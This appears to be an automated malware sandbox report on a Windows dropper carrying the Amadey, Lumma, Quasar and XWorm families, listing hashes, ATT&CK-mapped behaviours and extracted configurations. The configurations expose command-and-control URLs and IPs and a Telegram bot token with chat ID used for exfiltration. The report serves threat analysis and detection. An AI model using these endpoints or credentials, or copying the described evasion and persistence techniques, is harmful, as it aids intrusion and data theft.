amadey | 16b64046640bb6230c3bf41bdebb18224781fef9f2225bc30b82a063b1ed3fa8

Analysis

max time kernel
197s
max time network
301s
platform
windows10-ltsc_2021_x64
resource
win10ltsc2021-20250314-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
submitted
06/04/2025, 10:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

random.exe
Size

6.1MB
MD5

5a0c7d37859d3542f6772b9ef5ee5cf8
SHA1

27b53f77c9f99b87c6f9b1908310a5e2d73d1a79
SHA256

16b64046640bb6230c3bf41bdebb18224781fef9f2225bc30b82a063b1ed3fa8
SHA512

d2aa0be1f1cf059aaba9d3770c515f8be68698d7f631d321662feab5eae93996c9b4d23b862d7e59065701914498c9a92f1a687b302380dc56b9bc056b7fdc0a
SSDEEP

98304:zN9nbWR9YW1UZPiPQHMP6sYv15XNcDNwKmzyVyrooaCs3TOJ1yC/nCjlHI8GpHCz:HY9YO+PiPpY3NONweCZ/ycPBCvJ9F8

Score

10^/10

amadey lumma quasar xworm 092155 office04 bootkit credential_access defense_evasion discovery execution exploit persistence rat spyware stealer trojan

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://pepperiop.digital/oage

https://jrxsafer.top/shpaoz

https://6plantainklj.run/opafg

https://gpuerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://rambutanvcx.run/adioz

https://ywmedici.top/noagis

https://navstarx.shop/FoaJSi

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://reboundui.live/aomgd

https://krxspint.digital/kendwz

https://rhxhube.run/pogrs

https://grxeasyw.digital/xxepw

https://xrfxcaseq.live/gspaz

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes

encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Modded Client Startup
subdirectory
SubDir

Extracted

Family

xworm

Version

5.0

127.0.0.1:6666

5.180.155.29:6666

Mutex

QPPP7ypX2vFWlxk3

Attributes

Install_directory
%AppData%
install_file
USB.exe
telegram
https://api.telegram.org/bot8016176478:AAGVLtLncU8-ZLd-P86FqeQzAOXJybu2R9g/sendMessage?chat_id=5165347769

aes.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000b000000028390-10770.dat	family_xworm
behavioral2/memory/6072-10784-0x0000000000DE0000-0x0000000000DF2000-memory.dmp	family_xworm

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/memory/4068-8807-0x000000000CDD0000-0x000000000CF24000-memory.dmp	family_quasar
behavioral2/memory/4068-8808-0x000000000CF50000-0x000000000CF6A000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4108 created 3548	4108	MSBuild.exe	57

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
Contacts a large (27821) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d5441f9198.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	but2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7846036ed1.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0487ffa47e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1P22P6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2i0393.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
21566	4068	powershell.exe
28218	4068	powershell.exe
32871	4068	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
544	powershell.exe
4068	powershell.exe
2508	powershell.exe
3264	powershell.exe
4176	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 21 IoCs

flow	pid	Process
23296	4912	futors.exe
27963	4912	futors.exe
770	4852	rapes.exe
770	4852	rapes.exe
22587	4852	rapes.exe
25210	4912	futors.exe
25210	4912	futors.exe
30286	4852	rapes.exe
30286	4852	rapes.exe
30286	4852	rapes.exe
30286	4852	rapes.exe
30286	4852	rapes.exe
30286	4852	rapes.exe
30286	4852	rapes.exe
21	4852	rapes.exe
41	4852	rapes.exe
49	4852	rapes.exe
21563	4852	rapes.exe
13209	4852	rapes.exe
13209	4852	rapes.exe
28309	4912	futors.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
2132	takeown.exe
2324	icacls.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 15 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
4940	chrome.exe
3020	msedge.exe
4924	chrome.exe
3016	chrome.exe
1140	msedge.exe
2476	msedge.exe
1284	msedge.exe
5232	msedge.exe
2508	chrome.exe
5592	msedge.exe
772	msedge.exe
1296	chrome.exe
4544	msedge.exe
5448	msedge.exe
2244	msedge.exe

Checks BIOS information in registry 2 TTPs 20 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2i0393.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1P22P6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1P22P6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d5441f9198.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	but2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2i0393.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0487ffa47e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d5441f9198.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7846036ed1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0487ffa47e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	but2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7846036ed1.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Control Panel\International\Geo\Nation	bf09152990.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Control Panel\International\Geo\Nation	1P22P6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Control Panel\International\Geo\Nation	larBxd7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Control Panel\International\Geo\Nation	futors.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b2629635.cmd	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
4536	x2T29.exe
1636	1P22P6.exe
4852	rapes.exe
4844	2i0393.exe
1216	0487ffa47e.exe
5912	d5441f9198.exe
2480	9sWdA2p.exe
2504	but2.exe
3784	pcidrv.exe
4632	pcidrv.exe
1364	rapes.exe
5688	larBxd7.exe
1204	Jordan.com
272	qhjMWht.exe
1160	RYZusWg.exe
1636	pcidrv.exe
4332	rapes.exe
4692	IsValueCreated.exe
2192	LJl8AAr.exe
5332	n0hEgR9.exe
4784	amnew.exe
4912	futors.exe
4400	v7942.exe
2340	alex12312321.exe
3452	mTk60rz.exe
2008	ZSoeRVBe.exe
1328	legendarik.exe
1636	pcidrv.exe
2352	rapes.exe
1844	futors.exe
4748	bf09152990.exe
3756	crypted.exe
2532	YMauSAr.exe
1496	7846036ed1.exe
464	VrQSuEQ.exe
1564	javaplugin_service.exe
2000	javaservice_update.exe
5676	javaplatformw.exe
3748	svchost015.exe
2472	javaupdater_service.exe
5504	5uMVCoG.exe
3244	javaupdater_service.exe
3128	javasupport_update.exe
4444	javasupportw.exe
3764	javasupport_platform.exe
1032	javasupport_update.exe
5672	javaupdater_update.exe
3440	javaruntime_service.exe
5512	javaplugin_service.exe
2456	javaplatform_service.exe
4564	javasupport_update.exe
3096	javaplatform_update.exe
1492	javaservice_service.exe
6072	javaservice_update.exe
2000	javaruntime_platform.exe
2512	javaruntime.exe
2084	javaruntimew.exe
5940	javasupport_update.exe
1344	javaplatform.exe
5620	javaupdater_update.exe
1764	javaplugin_service.exe
5504	javaplatformw.exe
3440	javaplugin_update.exe
388	javaservice_update.exe

Identifies Wine through registry keys 2 TTPs 10 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Software\Wine	2i0393.exe
Key opened	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Software\Wine	7846036ed1.exe
Key opened	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Software\Wine	1P22P6.exe
Key opened	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Software\Wine	0487ffa47e.exe
Key opened	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Software\Wine	d5441f9198.exe
Key opened	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Software\Wine	but2.exe
Key opened	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Software\Wine	rapes.exe

Loads dropped DLL 46 IoCs

pid	Process
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe
2008	ZSoeRVBe.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2132	takeown.exe
2324	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaupdater_service.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaupdater_service.exe\""	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	random.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	x2T29.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7846036ed1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10053180101\\7846036ed1.exe"	futors.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
62	ip-api.com
6143	ipinfo.io
11613	ip-api.com
29707	ipinfo.io

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	0487ffa47e.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0008000000028388-9971.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
4368	tasklist.exe
2652	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

pid	Process
1636	1P22P6.exe
4852	rapes.exe
4844	2i0393.exe
1216	0487ffa47e.exe
5912	d5441f9198.exe
2504	but2.exe
1364	rapes.exe
4332	rapes.exe
2352	rapes.exe
1496	7846036ed1.exe

Suspicious use of SetThreadContext 12 IoCs

description	pid	Process	procid_target
PID 2192 set thread context of 5700	2192	LJl8AAr.exe	138
PID 4692 set thread context of 4108	4692	IsValueCreated.exe	139
PID 5332 set thread context of 5584	5332	n0hEgR9.exe	143
PID 4400 set thread context of 3252	4400	v7942.exe	154
PID 2340 set thread context of 1540	2340	alex12312321.exe	158
PID 4108 set thread context of 3520	4108	MSBuild.exe	159
PID 1328 set thread context of 3572	1328	legendarik.exe	175
PID 3756 set thread context of 5672	3756	crypted.exe	189
PID 464 set thread context of 4892	464	VrQSuEQ.exe	209
PID 1496 set thread context of 3748	1496	7846036ed1.exe	216
PID 5504 set thread context of 1460	5504	5uMVCoG.exe	223
PID 2468 set thread context of 3640	2468	0ac213fd32.exe	280

Drops file in Windows directory 22 IoCs

description	ioc	Process
File opened for modification	C:\Windows\LowerOrgasm	larBxd7.exe
File opened for modification	C:\Windows\ZuMiller	bf09152990.exe
File opened for modification	C:\Windows\CongressJvc	bf09152990.exe
File opened for modification	C:\Windows\MadnessSet	bf09152990.exe
File opened for modification	C:\Windows\DealersFocuses	bf09152990.exe
File opened for modification	C:\Windows\AucklandChef	bf09152990.exe
File opened for modification	C:\Windows\LocksWisconsin	bf09152990.exe
File opened for modification	C:\Windows\ExceedExec	bf09152990.exe
File created	C:\Windows\Tasks\rapes.job	1P22P6.exe
File opened for modification	C:\Windows\GovernmentalOttawa	larBxd7.exe
File opened for modification	C:\Windows\ModularVol	larBxd7.exe
File opened for modification	C:\Windows\SyntheticLil	bf09152990.exe
File opened for modification	C:\Windows\PolarRail	bf09152990.exe
File opened for modification	C:\Windows\LimeNirvana	bf09152990.exe
File opened for modification	C:\Windows\DependMedication	bf09152990.exe
File opened for modification	C:\Windows\AmongDouble	larBxd7.exe
File opened for modification	C:\Windows\GentleOklahoma	larBxd7.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\NewcastlePeripherals	bf09152990.exe
File opened for modification	C:\Windows\AndorraPrint	bf09152990.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4676	sc.exe
2136	sc.exe
3020	sc.exe
1828	sc.exe
4876	sc.exe
2012	sc.exe
5784	sc.exe
884	sc.exe
1500	sc.exe
4936	sc.exe
436	sc.exe
2480	sc.exe
1584	sc.exe
2376	sc.exe
1104	sc.exe
984	sc.exe
3128	sc.exe
460	sc.exe
3636	sc.exe
3620	sc.exe
4832	sc.exe
4192	sc.exe
2848	sc.exe
5912	sc.exe
1344	sc.exe
5048	sc.exe
5672	sc.exe
4508	sc.exe
4348	sc.exe
1768	sc.exe
4900	sc.exe
4496	sc.exe
3604	sc.exe
4576	sc.exe
5284	sc.exe
4480	sc.exe
3004	sc.exe
1872	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
548	4852	WerFault.exe	91
1480	3488	WerFault.exe	335

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7846036ed1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdater_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bf09152990.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplugin_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupport_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupport_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdater_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplugin_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Jordan.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatform_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaservice_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaruntime.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplugin_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatformw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplugin_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d5441f9198.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	but2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdater_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupportw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x2T29.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qhjMWht.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaruntimew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatform_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatform_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupportw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9sWdA2p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pcidrv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdater_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplugin_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YMauSAr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupport_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaservice_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2i0393.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaservice_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatformw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupport_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaservice_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaruntime_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1P22P6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0487ffa47e.exe

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe

Delays execution with timeout.exe 3 IoCs

defense_evasion

pid	Process
4700	timeout.exe
2176	timeout.exe
5528	timeout.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

GoLang User-Agent 1 IoCs

